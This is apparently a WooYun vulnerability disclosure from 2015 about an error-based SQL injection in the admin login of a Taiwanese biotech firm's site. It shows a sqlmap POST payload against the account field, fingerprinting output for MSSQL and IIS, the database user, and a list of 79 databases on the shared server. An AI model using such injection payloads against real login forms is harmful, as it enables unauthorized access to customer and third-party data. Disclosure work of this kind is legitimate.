当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161751

漏洞标题:再生緣生物科技管理后台post注入(报错注入+依旧可测漏79个数据库)(臺灣地區)

相关厂商:再生緣生物科技有限公司

漏洞作者: 路人甲

提交时间:2015-12-16 11:57

修复时间:2016-02-01 18:25

公开时间:2016-02-01 18:25

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

再生緣生物科技管理后台post注入(报错注入+依旧可测漏79个数据库)

详细说明:

台湾站点很好玩,只需要一般情况后面加个admin,地址会自动补全 哈哈

http://**.**.**.**/admin/Login.aspx


对用户或密码,单引号进行报错了

~ES10N%NY1U1AM%D0}5]~]W.png


Place: POST
Parameter: TextBoxAccount
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HA
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE
kZEetZIO2ihrMCc3tmbGqbhRcq1ay&__VIEWSTATEGENERATOR=82312306&TextBoxA
' AND 9868=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(103)+CHAR(111)+CHAR(
(CASE WHEN (9868=9868) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CH
(120)+CHAR(121)+CHAR(58))) AND 'ipuW'='ipuW&TextBoxPasswd=admin&Butt
---
[11:15:10] [INFO] testing Microsoft SQL Server
[11:15:11] [INFO] confirming Microsoft SQL Server
[11:15:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.
back-end DBMS: Microsoft SQL Server 2005
[11:15:12] [INFO] fetching current user
[11:15:13] [INFO] retrieved: sinocell
current user: 'sinocell'


available databases [79]:
[*] 21shopcomtw
[*] albertlannet
[*] Americanas
[*] angdb
[*] Aplan168
[*] artbarncorp
[*] beautymmcomtw
[*] biochiffon
[*] cellina
[*] cfmw
[*] chbookcomtw_bookstore
[*] ciaaorgtw
[*] cnra
[*] darwin178com
[*] db1005680_vtp
[*] dcdccomtw
[*] dgrcomtw
[*] digicraftcomtw_
[*] dubacotechcom
[*] ergocarecomtw
[*] ESETRADB
[*] eshop
[*] fullhouseidcom
[*] fulltencomtw
[*] gclcomtw
[*] GDATA_AntiVirus_ManagementServer
[*] GMall
[*] goldcarecomtw
[*] goodnews
[*] grasshillnet
[*] greenolicomtw
[*] hanorcomtw
[*] hohaiyacomtw
[*] HollyLuck
[*] homesweetycom
[*] hwashing_com_tw123
[*] jp8comtw
[*] **.**.**.**
[*] master
[*] mobimedia
[*] model
[*] msdb
[*] myharmonicanet_YellowStone
[*] netgogocomtw
[*] newchicom
[*] omroncomtw
[*] popsurveycomtw_
[*] proth
[*] rangecomtw_ShopMall
[*] Sinocell
[*] sonypicturescomtw
[*] soulandcom
[*] spacetourscomtw
[*] Ss-knifecomtw
[*] steercomtw
[*] stock88168comtw
[*] sunboothcomtw_WebShop
[*] sunrayfactory
[*] syncmen
[*] taitien
[*] tempdb
[*] template_elate
[*] template_elate2014
[*] timemask
[*] tiplocomtw
[*] toastlivingcom
[*] travel
[*] ubestdigitalcom
[*] ultitecprotectioncom
[*] UTC_DispWeb_4_Tattoo
[*] v-electronicscom
[*] vugeyes
[*] w007820w
[*] w007820w2
[*] WANGPIIN
[*] water_balance
[*] wHLA_SQL
[*] x-lurecom
[*] yuansun


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-18 19:15

厂商回复:

感謝通報

最新状态:

暂无